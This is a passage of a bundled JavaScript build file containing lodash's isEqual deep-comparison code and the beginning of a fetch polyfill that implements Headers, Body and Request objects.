 * @returns {Array} Returns the array of property names and symbols.
 */ function baseGetAllKeys(object, keysFunc, symbolsFunc) {
    var result = keysFunc(object);
    return isArray(object) ? result : arrayPush(result, symbolsFunc(object));
}
/**
 * The base implementation of `getTag` without fallbacks for buggy environments.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the `toStringTag`.
 */ function baseGetTag(value) {
    if (value == null) return value === undefined ? undefinedTag : nullTag;
    return symToStringTag && symToStringTag in Object(value) ? getRawTag(value) : objectToString(value);
}
/**
 * The base implementation of `_.isArguments`.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an `arguments` object,
 */ function baseIsArguments(value) {
    return isObjectLike(value) && baseGetTag(value) == argsTag;
}
/**
 * The base implementation of `_.isEqual` which supports partial comparisons
 * and tracks traversed objects.
 *
 * @private
 * @param {*} value The value to compare.
 * @param {*} other The other value to compare.
 * @param {boolean} bitmask The bitmask flags.
 *  1 - Unordered comparison
 *  2 - Partial comparison
 * @param {Function} [customizer] The function to customize comparisons.
 * @param {Object} [stack] Tracks traversed `value` and `other` objects.
 * @returns {boolean} Returns `true` if the values are equivalent, else `false`.
 */ function baseIsEqual(value, other, bitmask, customizer, stack) {
    if (value === other) return true;
    if (value == null || other == null || !isObjectLike(value) && !isObjectLike(other)) return value !== value && other !== other;
    return baseIsEqualDeep(value, other, bitmask, customizer, baseIsEqual, stack);
}
/**
 * A specialized version of `baseIsEqual` for arrays and objects which performs
 * deep comparisons and tracks traversed objects enabling objects with circular
 * references to be compared.
 *
 * @private
 * @param {Object} object The object to compare.
 * @param {Object} other The other object to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} [stack] Tracks traversed `object` and `other` objects.
 * @returns {boolean} Returns `true` if the objects are equivalent, else `false`.
 */ function baseIsEqualDeep(object, other, bitmask, customizer, equalFunc, stack) {
    var objIsArr = isArray(object), othIsArr = isArray(other), objTag = objIsArr ? arrayTag : getTag(object), othTag = othIsArr ? arrayTag : getTag(other);
    objTag = objTag == argsTag ? objectTag : objTag;
    othTag = othTag == argsTag ? objectTag : othTag;
    var objIsObj = objTag == objectTag, othIsObj = othTag == objectTag, isSameTag = objTag == othTag;
    if (isSameTag && isBuffer(object)) {
        if (!isBuffer(other)) return false;
        objIsArr = true;
        objIsObj = false;
    }
    if (isSameTag && !objIsObj) {
        stack || (stack = new Stack);
        return objIsArr || isTypedArray(object) ? equalArrays(object, other, bitmask, customizer, equalFunc, stack) : equalByTag(object, other, objTag, bitmask, customizer, equalFunc, stack);
    }
    if (!(bitmask & COMPARE_PARTIAL_FLAG)) {
        var objIsWrapped = objIsObj && hasOwnProperty.call(object, "__wrapped__"), othIsWrapped = othIsObj && hasOwnProperty.call(other, "__wrapped__");
        if (objIsWrapped || othIsWrapped) {
            var objUnwrapped = objIsWrapped ? object.value() : object, othUnwrapped = othIsWrapped ? other.value() : other;
            stack || (stack = new Stack);
            return equalFunc(objUnwrapped, othUnwrapped, bitmask, customizer, stack);
        }
    }
    if (!isSameTag) return false;
    stack || (stack = new Stack);
    return equalObjects(object, other, bitmask, customizer, equalFunc, stack);
}
/**
 * The base implementation of `_.isNative` without bad shim checks.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a native function,
 *  else `false`.
 */ function baseIsNative(value) {
    if (!isObject(value) || isMasked(value)) return false;
    var pattern = isFunction(value) ? reIsNative : reIsHostCtor;
    return pattern.test(toSource(value));
}
/**
 * The base implementation of `_.isTypedArray` without Node.js optimizations.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a typed array, else `false`.
 */ function baseIsTypedArray(value) {
    return isObjectLike(value) && isLength(value.length) && !!typedArrayTags[baseGetTag(value)];
}
/**
 * The base implementation of `_.keys` which doesn't treat sparse arrays as dense.
 *
 * @private
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of property names.
 */ function baseKeys(object) {
    if (!isPrototype(object)) return nativeKeys(object);
    var result = [];
    for(var key in Object(object))if (hasOwnProperty.call(object, key) && key != "constructor") result.push(key);
    return result;
}
/**
 * A specialized version of `baseIsEqualDeep` for arrays with support for
 * partial deep comparisons.
 *
 * @private
 * @param {Array} array The array to compare.
 * @param {Array} other The other array to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} stack Tracks traversed `array` and `other` objects.
 * @returns {boolean} Returns `true` if the arrays are equivalent, else `false`.
 */ function equalArrays(array, other, bitmask, customizer, equalFunc, stack) {
    var isPartial = bitmask & COMPARE_PARTIAL_FLAG, arrLength = array.length, othLength = other.length;
    if (arrLength != othLength && !(isPartial && othLength > arrLength)) return false;
    // Assume cyclic values are equal.
    var stacked = stack.get(array);
    if (stacked && stack.get(other)) return stacked == other;
    var index = -1, result = true, seen = bitmask & COMPARE_UNORDERED_FLAG ? new SetCache : undefined;
    stack.set(array, other);
    stack.set(other, array);
    // Ignore non-index properties.
    while(++index < arrLength){
        var arrValue = array[index], othValue = other[index];
        if (customizer) var compared = isPartial ? customizer(othValue, arrValue, index, other, array, stack) : customizer(arrValue, othValue, index, array, other, stack);
        if (compared !== undefined) {
            if (compared) continue;
            result = false;
            break;
        }
        // Recursively compare arrays (susceptible to call stack limits).
        if (seen) {
            if (!arraySome(other, function(othValue, othIndex) {
                if (!cacheHas(seen, othIndex) && (arrValue === othValue || equalFunc(arrValue, othValue, bitmask, customizer, stack))) return seen.push(othIndex);
            })) {
                result = false;
                break;
            }
        } else if (!(arrValue === othValue || equalFunc(arrValue, othValue, bitmask, customizer, stack))) {
            result = false;
            break;
        }
    }
    stack["delete"](array);
    stack["delete"](other);
    return result;
}
/**
 * A specialized version of `baseIsEqualDeep` for comparing objects of
 * the same `toStringTag`.
 *
 * **Note:** This function only supports comparing values with tags of
 * `Boolean`, `Date`, `Error`, `Number`, `RegExp`, or `String`.
 *
 * @private
 * @param {Object} object The object to compare.
 * @param {Object} other The other object to compare.
 * @param {string} tag The `toStringTag` of the objects to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} stack Tracks traversed `object` and `other` objects.
 * @returns {boolean} Returns `true` if the objects are equivalent, else `false`.
 */ function equalByTag(object, other, tag, bitmask, customizer, equalFunc, stack) {
    switch(tag){
        case dataViewTag:
            if (object.byteLength != other.byteLength || object.byteOffset != other.byteOffset) return false;
            object = object.buffer;
            other = other.buffer;
        case arrayBufferTag:
            if (object.byteLength != other.byteLength || !equalFunc(new Uint8Array(object), new Uint8Array(other))) return false;
            return true;
        case boolTag:
        case dateTag:
        case numberTag:
            // Coerce booleans to `1` or `0` and dates to milliseconds.
            // Invalid dates are coerced to `NaN`.
            return eq(+object, +other);
        case errorTag:
            return object.name == other.name && object.message == other.message;
        case regexpTag:
        case stringTag:
            // Coerce regexes to strings and treat strings, primitives and objects,
            // as equal. See http://www.ecma-international.org/ecma-262/7.0/#sec-regexp.prototype.tostring
            // for more details.
            return object == other + "";
        case mapTag:
            var convert = mapToArray;
        case setTag:
            var isPartial = bitmask & COMPARE_PARTIAL_FLAG;
            convert || (convert = setToArray);
            if (object.size != other.size && !isPartial) return false;
            // Assume cyclic values are equal.
            var stacked = stack.get(object);
            if (stacked) return stacked == other;
            bitmask |= COMPARE_UNORDERED_FLAG;
            // Recursively compare objects (susceptible to call stack limits).
            stack.set(object, other);
            var result = equalArrays(convert(object), convert(other), bitmask, customizer, equalFunc, stack);
            stack["delete"](object);
            return result;
        case symbolTag:
            if (symbolValueOf) return symbolValueOf.call(object) == symbolValueOf.call(other);
    }
    return false;
}
/**
 * A specialized version of `baseIsEqualDeep` for objects with support for
 * partial deep comparisons.
 *
 * @private
 * @param {Object} object The object to compare.
 * @param {Object} other The other object to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} stack Tracks traversed `object` and `other` objects.
 * @returns {boolean} Returns `true` if the objects are equivalent, else `false`.
 */ function equalObjects(object, other, bitmask, customizer, equalFunc, stack) {
    var isPartial = bitmask & COMPARE_PARTIAL_FLAG, objProps = getAllKeys(object), objLength = objProps.length, othProps = getAllKeys(other), othLength = othProps.length;
    if (objLength != othLength && !isPartial) return false;
    var index = objLength;
    while(index--){
        var key = objProps[index];
        if (!(isPartial ? key in other : hasOwnProperty.call(other, key))) return false;
    }
    // Assume cyclic values are equal.
    var stacked = stack.get(object);
    if (stacked && stack.get(other)) return stacked == other;
    var result = true;
    stack.set(object, other);
    stack.set(other, object);
    var skipCtor = isPartial;
    while(++index < objLength){
        key = objProps[index];
        var objValue = object[key], othValue = other[key];
        if (customizer) var compared = isPartial ? customizer(othValue, objValue, key, other, object, stack) : customizer(objValue, othValue, key, object, other, stack);
        // Recursively compare objects (susceptible to call stack limits).
        if (!(compared === undefined ? objValue === othValue || equalFunc(objValue, othValue, bitmask, customizer, stack) : compared)) {
            result = false;
            break;
        }
        skipCtor || (skipCtor = key == "constructor");
    }
    if (result && !skipCtor) {
        var objCtor = object.constructor, othCtor = other.constructor;
        // Non `Object` object instances with different constructors are not equal.
        if (objCtor != othCtor && "constructor" in object && "constructor" in other && !(typeof objCtor == "function" && objCtor instanceof objCtor && typeof othCtor == "function" && othCtor instanceof othCtor)) result = false;
    }
    stack["delete"](object);
    stack["delete"](other);
    return result;
}
/**
 * Creates an array of own enumerable property names and symbols of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of property names and symbols.
 */ function getAllKeys(object) {
    return baseGetAllKeys(object, keys, getSymbols);
}
/**
 * Gets the data for `map`.
 *
 * @private
 * @param {Object} map The map to query.
 * @param {string} key The reference key.
 * @returns {*} Returns the map data.
 */ function getMapData(map, key) {
    var data = map.__data__;
    return isKeyable(key) ? data[typeof key == "string" ? "string" : "hash"] : data.map;
}
/**
 * Gets the native function at `key` of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @param {string} key The key of the method to get.
 * @returns {*} Returns the function if it's native, else `undefined`.
 */ function getNative(object, key) {
    var value = getValue(object, key);
    return baseIsNative(value) ? value : undefined;
}
/**
 * A specialized version of `baseGetTag` which ignores `Symbol.toStringTag` values.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the raw `toStringTag`.
 */ function getRawTag(value) {
    var isOwn = hasOwnProperty.call(value, symToStringTag), tag = value[symToStringTag];
    try {
        value[symToStringTag] = undefined;
        var unmasked = true;
    } catch (e) {}
    var result = nativeObjectToString.call(value);
    if (unmasked) {
        if (isOwn) value[symToStringTag] = tag;
        else delete value[symToStringTag];
    }
    return result;
}
/**
 * Creates an array of the own enumerable symbols of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of symbols.
 */ var getSymbols = !nativeGetSymbols ? stubArray : function(object) {
    if (object == null) return [];
    object = Object(object);
    return arrayFilter(nativeGetSymbols(object), function(symbol) {
        return propertyIsEnumerable.call(object, symbol);
    });
};
/**
 * Gets the `toStringTag` of `value`.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the `toStringTag`.
 */ var getTag = baseGetTag;
// Fallback for data views, maps, sets, and weak maps in IE 11 and promises in Node.js < 6.
if (DataView && getTag(new DataView(new ArrayBuffer(1))) != dataViewTag || Map && getTag(new Map) != mapTag || Promise && getTag(Promise.resolve()) != promiseTag || Set && getTag(new Set) != setTag || WeakMap && getTag(new WeakMap) != weakMapTag) getTag = function(value) {
    var result = baseGetTag(value), Ctor = result == objectTag ? value.constructor : undefined, ctorString = Ctor ? toSource(Ctor) : "";
    if (ctorString) switch(ctorString){
        case dataViewCtorString:
            return dataViewTag;
        case mapCtorString:
            return mapTag;
        case promiseCtorString:
            return promiseTag;
        case setCtorString:
            return setTag;
        case weakMapCtorString:
            return weakMapTag;
    }
    return result;
};
/**
 * Checks if `value` is a valid array-like index.
 *
 * @private
 * @param {*} value The value to check.
 * @param {number} [length=MAX_SAFE_INTEGER] The upper bounds of a valid index.
 * @returns {boolean} Returns `true` if `value` is a valid index, else `false`.
 */ function isIndex(value, length) {
    length = length == null ? MAX_SAFE_INTEGER : length;
    return !!length && (typeof value == "number" || reIsUint.test(value)) && value > -1 && value % 1 == 0 && value < length;
}
/**
 * Checks if `value` is suitable for use as unique object key.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is suitable, else `false`.
 */ function isKeyable(value) {
    var type = typeof value;
    return type == "string" || type == "number" || type == "symbol" || type == "boolean" ? value !== "__proto__" : value === null;
}
/**
 * Checks if `func` has its source masked.
 *
 * @private
 * @param {Function} func The function to check.
 * @returns {boolean} Returns `true` if `func` is masked, else `false`.
 */ function isMasked(func) {
    return !!maskSrcKey && maskSrcKey in func;
}
/**
 * Checks if `value` is likely a prototype object.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a prototype, else `false`.
 */ function isPrototype(value) {
    var Ctor = value && value.constructor, proto = typeof Ctor == "function" && Ctor.prototype || objectProto;
    return value === proto;
}
/**
 * Converts `value` to a string using `Object.prototype.toString`.
 *
 * @private
 * @param {*} value The value to convert.
 * @returns {string} Returns the converted string.
 */ function objectToString(value) {
    return nativeObjectToString.call(value);
}
/**
 * Converts `func` to its source code.
 *
 * @private
 * @param {Function} func The function to convert.
 * @returns {string} Returns the source code.
 */ function toSource(func) {
    if (func != null) {
        try {
            return funcToString.call(func);
        } catch (e) {}
        try {
            return func + "";
        } catch (e) {}
    }
    return "";
}
/**
 * Performs a
 * [`SameValueZero`](http://ecma-international.org/ecma-262/7.0/#sec-samevaluezero)
 * comparison between two values to determine if they are equivalent.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to compare.
 * @param {*} other The other value to compare.
 * @returns {boolean} Returns `true` if the values are equivalent, else `false`.
 * @example
 *
 * var object = { 'a': 1 };
 * var other = { 'a': 1 };
 *
 * _.eq(object, object);
 * // => true
 *
 * _.eq(object, other);
 * // => false
 *
 * _.eq('a', 'a');
 * // => true
 *
 * _.eq('a', Object('a'));
 * // => false
 *
 * _.eq(NaN, NaN);
 * // => true
 */ function eq(value, other) {
    return value === other || value !== value && other !== other;
}
/**
 * Checks if `value` is likely an `arguments` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an `arguments` object,
 *  else `false`.
 * @example
 *
 * _.isArguments(function() { return arguments; }());
 * // => true
 *
 * _.isArguments([1, 2, 3]);
 * // => false
 */ var isArguments = baseIsArguments(function() {
    return arguments;
}()) ? baseIsArguments : function(value) {
    return isObjectLike(value) && hasOwnProperty.call(value, "callee") && !propertyIsEnumerable.call(value, "callee");
};
/**
 * Checks if `value` is classified as an `Array` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an array, else `false`.
 * @example
 *
 * _.isArray([1, 2, 3]);
 * // => true
 *
 * _.isArray(document.body.children);
 * // => false
 *
 * _.isArray('abc');
 * // => false
 *
 * _.isArray(_.noop);
 * // => false
 */ var isArray = Array.isArray;
/**
 * Checks if `value` is array-like. A value is considered array-like if it's
 * not a function and has a `value.length` that's an integer greater than or
 * equal to `0` and less than or equal to `Number.MAX_SAFE_INTEGER`.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is array-like, else `false`.
 * @example
 *
 * _.isArrayLike([1, 2, 3]);
 * // => true
 *
 * _.isArrayLike(document.body.children);
 * // => true
 *
 * _.isArrayLike('abc');
 * // => true
 *
 * _.isArrayLike(_.noop);
 * // => false
 */ function isArrayLike(value) {
    return value != null && isLength(value.length) && !isFunction(value);
}
/**
 * Checks if `value` is a buffer.
 *
 * @static
 * @memberOf _
 * @since 4.3.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a buffer, else `false`.
 * @example
 *
 * _.isBuffer(new Buffer(2));
 * // => true
 *
 * _.isBuffer(new Uint8Array(2));
 * // => false
 */ var isBuffer = nativeIsBuffer || stubFalse;
/**
 * Performs a deep comparison between two values to determine if they are
 * equivalent.
 *
 * **Note:** This method supports comparing arrays, array buffers, booleans,
 * date objects, error objects, maps, numbers, `Object` objects, regexes,
 * sets, strings, symbols, and typed arrays. `Object` objects are compared
 * by their own, not inherited, enumerable properties. Functions and DOM
 * nodes are compared by strict equality, i.e. `===`.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to compare.
 * @param {*} other The other value to compare.
 * @returns {boolean} Returns `true` if the values are equivalent, else `false`.
 * @example
 *
 * var object = { 'a': 1 };
 * var other = { 'a': 1 };
 *
 * _.isEqual(object, other);
 * // => true
 *
 * object === other;
 * // => false
 */ function isEqual(value, other) {
    return baseIsEqual(value, other);
}
/**
 * Checks if `value` is classified as a `Function` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a function, else `false`.
 * @example
 *
 * _.isFunction(_);
 * // => true
 *
 * _.isFunction(/abc/);
 * // => false
 */ function isFunction(value) {
    if (!isObject(value)) return false;
    // The use of `Object#toString` avoids issues with the `typeof` operator
    // in Safari 9 which returns 'object' for typed arrays and other constructors.
    var tag = baseGetTag(value);
    return tag == funcTag || tag == genTag || tag == asyncTag || tag == proxyTag;
}
/**
 * Checks if `value` is a valid array-like length.
 *
 * **Note:** This method is loosely based on
 * [`ToLength`](http://ecma-international.org/ecma-262/7.0/#sec-tolength).
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a valid length, else `false`.
 * @example
 *
 * _.isLength(3);
 * // => true
 *
 * _.isLength(Number.MIN_VALUE);
 * // => false
 *
 * _.isLength(Infinity);
 * // => false
 *
 * _.isLength('3');
 * // => false
 */ function isLength(value) {
    return typeof value == "number" && value > -1 && value % 1 == 0 && value <= MAX_SAFE_INTEGER;
}
/**
 * Checks if `value` is the
 * [language type](http://www.ecma-international.org/ecma-262/7.0/#sec-ecmascript-language-types)
 * of `Object`. (e.g. arrays, functions, objects, regexes, `new Number(0)`, and `new String('')`)
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an object, else `false`.
 * @example
 *
 * _.isObject({});
 * // => true
 *
 * _.isObject([1, 2, 3]);
 * // => true
 *
 * _.isObject(_.noop);
 * // => true
 *
 * _.isObject(null);
 * // => false
 */ function isObject(value) {
    var type = typeof value;
    return value != null && (type == "object" || type == "function");
}
/**
 * Checks if `value` is object-like. A value is object-like if it's not `null`
 * and has a `typeof` result of "object".
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is object-like, else `false`.
 * @example
 *
 * _.isObjectLike({});
 * // => true
 *
 * _.isObjectLike([1, 2, 3]);
 * // => true
 *
 * _.isObjectLike(_.noop);
 * // => false
 *
 * _.isObjectLike(null);
 * // => false
 */ function isObjectLike(value) {
    return value != null && typeof value == "object";
}
/**
 * Checks if `value` is classified as a typed array.
 *
 * @static
 * @memberOf _
 * @since 3.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a typed array, else `false`.
 * @example
 *
 * _.isTypedArray(new Uint8Array);
 * // => true
 *
 * _.isTypedArray([]);
 * // => false
 */ var isTypedArray = nodeIsTypedArray ? baseUnary(nodeIsTypedArray) : baseIsTypedArray;
/**
 * Creates an array of the own enumerable property names of `object`.
 *
 * **Note:** Non-object values are coerced to objects. See the
 * [ES spec](http://ecma-international.org/ecma-262/7.0/#sec-object.keys)
 * for more details.
 *
 * @static
 * @since 0.1.0
 * @memberOf _
 * @category Object
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of property names.
 * @example
 *
 * function Foo() {
 *   this.a = 1;
 *   this.b = 2;
 * }
 *
 * Foo.prototype.c = 3;
 *
 * _.keys(new Foo);
 * // => ['a', 'b'] (iteration order is not guaranteed)
 *
 * _.keys('hi');
 * // => ['0', '1']
 */ function keys(object) {
    return isArrayLike(object) ? arrayLikeKeys(object) : baseKeys(object);
}
/**
 * This method returns a new empty array.
 *
 * @static
 * @memberOf _
 * @since 4.13.0
 * @category Util
 * @returns {Array} Returns the new empty array.
 * @example
 *
 * var arrays = _.times(2, _.stubArray);
 *
 * console.log(arrays);
 * // => [[], []]
 *
 * console.log(arrays[0] === arrays[1]);
 * // => false
 */ function stubArray() {
    return [];
}
/**
 * This method returns `false`.
 *
 * @static
 * @memberOf _
 * @since 4.13.0
 * @category Util
 * @returns {boolean} Returns `false`.
 * @example
 *
 * _.times(2, _.stubFalse);
 * // => [false, false]
 */ function stubFalse() {
    return false;
}
module.exports = isEqual;

});

parcelRequire.register("R5nvG", function(module, exports) {
var global = typeof self !== "undefined" ? self : this;
var __self__ = function() {
    function F() {
        this.fetch = false;
        this.DOMException = global.DOMException;
    }
    F.prototype = global;
    return new F();
}();
(function(self1) {
    var irrelevant = function(exports1) {
        var support = {
            searchParams: "URLSearchParams" in self1,
            iterable: "Symbol" in self1 && "iterator" in Symbol,
            blob: "FileReader" in self1 && "Blob" in self1 && function() {
                try {
                    new Blob();
                    return true;
                } catch (e) {
                    return false;
                }
            }(),
            formData: "FormData" in self1,
            arrayBuffer: "ArrayBuffer" in self1
        };
        function isDataView(obj) {
            return obj && DataView.prototype.isPrototypeOf(obj);
        }
        if (support.arrayBuffer) {
            var viewClasses = [
                "[object Int8Array]",
                "[object Uint8Array]",
                "[object Uint8ClampedArray]",
                "[object Int16Array]",
                "[object Uint16Array]",
                "[object Int32Array]",
                "[object Uint32Array]",
                "[object Float32Array]",
                "[object Float64Array]"
            ];
            var isArrayBufferView = ArrayBuffer.isView || function(obj) {
                return obj && viewClasses.indexOf(Object.prototype.toString.call(obj)) > -1;
            };
        }
        function normalizeName(name) {
            if (typeof name !== "string") name = String(name);
            if (/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(name)) throw new TypeError("Invalid character in header field name");
            return name.toLowerCase();
        }
        function normalizeValue(value) {
            if (typeof value !== "string") value = String(value);
            return value;
        }
        // Build a destructive iterator for the value list
        function iteratorFor(items) {
            var iterator = {
                next: function() {
                    var value = items.shift();
                    return {
                        done: value === undefined,
                        value: value
                    };
                }
            };
            if (support.iterable) iterator[Symbol.iterator] = function() {
                return iterator;
            };
            return iterator;
        }
        function Headers(headers) {
            this.map = {};
            if (headers instanceof Headers) headers.forEach(function(value, name) {
                this.append(name, value);
            }, this);
            else if (Array.isArray(headers)) headers.forEach(function(header) {
                this.append(header[0], header[1]);
            }, this);
            else if (headers) Object.getOwnPropertyNames(headers).forEach(function(name) {
                this.append(name, headers[name]);
            }, this);
        }
        Headers.prototype.append = function(name, value) {
            name = normalizeName(name);
            value = normalizeValue(value);
            var oldValue = this.map[name];
            this.map[name] = oldValue ? oldValue + ", " + value : value;
        };
        Headers.prototype["delete"] = function(name) {
            delete this.map[normalizeName(name)];
        };
        Headers.prototype.get = function(name) {
            name = normalizeName(name);
            return this.has(name) ? this.map[name] : null;
        };
        Headers.prototype.has = function(name) {
            return this.map.hasOwnProperty(normalizeName(name));
        };
        Headers.prototype.set = function(name, value) {
            this.map[normalizeName(name)] = normalizeValue(value);
        };
        Headers.prototype.forEach = function(callback, thisArg) {
            for(var name in this.map)if (this.map.hasOwnProperty(name)) callback.call(thisArg, this.map[name], name, this);
        };
        Headers.prototype.keys = function() {
            var items = [];
            this.forEach(function(value, name) {
                items.push(name);
            });
            return iteratorFor(items);
        };
        Headers.prototype.values = function() {
            var items = [];
            this.forEach(function(value) {
                items.push(value);
            });
            return iteratorFor(items);
        };
        Headers.prototype.entries = function() {
            var items = [];
            this.forEach(function(value, name) {
                items.push([
                    name,
                    value
                ]);
            });
            return iteratorFor(items);
        };
        if (support.iterable) Headers.prototype[Symbol.iterator] = Headers.prototype.entries;
        function consumed(body) {
            if (body.bodyUsed) return Promise.reject(new TypeError("Already read"));
            body.bodyUsed = true;
        }
        function fileReaderReady(reader) {
            return new Promise(function(resolve, reject) {
                reader.onload = function() {
                    resolve(reader.result);
                };
                reader.onerror = function() {
                    reject(reader.error);
                };
            });
        }
        function readBlobAsArrayBuffer(blob) {
            var reader = new FileReader();
            var promise = fileReaderReady(reader);
            reader.readAsArrayBuffer(blob);
            return promise;
        }
        function readBlobAsText(blob) {
            var reader = new FileReader();
            var promise = fileReaderReady(reader);
            reader.readAsText(blob);
            return promise;
        }
        function readArrayBufferAsText(buf) {
            var view = new Uint8Array(buf);
            var chars = new Array(view.length);
            for(var i = 0; i < view.length; i++)chars[i] = String.fromCharCode(view[i]);
            return chars.join("");
        }
        function bufferClone(buf) {
            if (buf.slice) return buf.slice(0);
            else {
                var view = new Uint8Array(buf.byteLength);
                view.set(new Uint8Array(buf));
                return view.buffer;
            }
        }
        function Body() {
            this.bodyUsed = false;
            this._initBody = function(body) {
                this._bodyInit = body;
                if (!body) this._bodyText = "";
                else if (typeof body === "string") this._bodyText = body;
                else if (support.blob && Blob.prototype.isPrototypeOf(body)) this._bodyBlob = body;
                else if (support.formData && FormData.prototype.isPrototypeOf(body)) this._bodyFormData = body;
                else if (support.searchParams && URLSearchParams.prototype.isPrototypeOf(body)) this._bodyText = body.toString();
                else if (support.arrayBuffer && support.blob && isDataView(body)) {
                    this._bodyArrayBuffer = bufferClone(body.buffer);
                    // IE 10-11 can't handle a DataView body.
                    this._bodyInit = new Blob([
                        this._bodyArrayBuffer
                    ]);
                } else if (support.arrayBuffer && (ArrayBuffer.prototype.isPrototypeOf(body) || isArrayBufferView(body))) this._bodyArrayBuffer = bufferClone(body);
                else this._bodyText = body = Object.prototype.toString.call(body);
                if (!this.headers.get("content-type")) {
                    if (typeof body === "string") this.headers.set("content-type", "text/plain;charset=UTF-8");
                    else if (this._bodyBlob && this._bodyBlob.type) this.headers.set("content-type", this._bodyBlob.type);
                    else if (support.searchParams && URLSearchParams.prototype.isPrototypeOf(body)) this.headers.set("content-type", "application/x-www-form-urlencoded;charset=UTF-8");
                }
            };
            if (support.blob) {
                this.blob = function() {
                    var rejected = consumed(this);
                    if (rejected) return rejected;
                    if (this._bodyBlob) return Promise.resolve(this._bodyBlob);
                    else if (this._bodyArrayBuffer) return Promise.resolve(new Blob([
                        this._bodyArrayBuffer
                    ]));
                    else if (this._bodyFormData) throw new Error("could not read FormData body as blob");
                    else return Promise.resolve(new Blob([
                        this._bodyText
                    ]));
                };
                this.arrayBuffer = function() {
                    if (this._bodyArrayBuffer) return consumed(this) || Promise.resolve(this._bodyArrayBuffer);
                    else return this.blob().then(readBlobAsArrayBuffer);
                };
            }
            this.text = function() {
                var rejected = consumed(this);
                if (rejected) return rejected;
                if (this._bodyBlob) return readBlobAsText(this._bodyBlob);
                else if (this._bodyArrayBuffer) return Promise.resolve(readArrayBufferAsText(this._bodyArrayBuffer));
                else if (this._bodyFormData) throw new Error("could not read FormData body as text");
                else return Promise.resolve(this._bodyText);
            };
            if (support.formData) this.formData = function() {
                return this.text().then(decode);
            };
            this.json = function() {
                return this.text().then(JSON.parse);
            };
            return this;
        }
        // HTTP methods whose capitalization should be normalized
        var methods = [
            "DELETE",
            "GET",
            "HEAD",
            "OPTIONS",
            "POST",
            "PUT"
        ];
        function normalizeMethod(method) {
            var upcased = method.toUpperCase();
            return methods.indexOf(upcased) > -1 ? upcased : method;
        }
        function Request(input, options) {
            options = options || {};
            var body = options.body;
            if (input instanceof Request) {
                if (input.bodyUsed) throw new TypeError("Already read");
                this.url = input.url;
                this.credentials = input.credentials;
                if (!options.headers) this.headers = new Headers(input.headers);
                this.method = input.method;
                this.mode = input.mode;
                this.signal = input.signal;
                if (!body && input._bodyInit != null) {
                    body = input._bodyInit;
                    input.bodyUsed = true;
                }
            } else this.url = String(input);
            this.credentials = options.credentials || this.credentials || "same-origin";
            if (options.headers || !this.headers) this.headers = new Headers(options.headers);
            this.method = normalizeMethod(options.method || this.method || "GET");
            this.mode = options.mode || this.mode || null;
            this.signal = options.signal || this.signal;
            this.referrer = null;
            if ((this.method === "GET" || this.method === "HEAD") && body) throw new TypeError("Body not allowed for GET or HEAD requests");
            this._initBody(body);
        }
        Request.prototype.clone = function() {
            return new Request(this, {
                body: this._bodyInit
            });
        };
        function decode(body) {
            var form = new FormData();
            body.trim().split("&").forEach(function(bytes) {
                if (bytes) {
                    var split = bytes.split("=");
                    var name = split.shift().replace(/\+/g, " ");
                    var value = split.join("=").replace(/\+/g, " ");
                    form.append(decodeURIComponent(name), decodeURIComponent(value));
                }
            });
            return form;
        }
        function parseHeaders(rawHeaders) {
            var headers = new Headers();
            // Replace instances of \r\n and \n followed by at least one space or horizontal tab with a space
            // https://tools.ietf.org/html/rfc7230#section-3.2
            var preProcessedHeaders = rawHeaders.replace(/\r?\n[\t ]+/g, " ");
            preProcessedHeaders.split(/\r?\n/).forEach(function(line) {
                var parts = line.split(":");
                var key = parts.shift().trim();
                if (key) {
                    var value = parts.join(":").trim();
                    headers.append(key, value);
                }
            });
            return headers;
        }
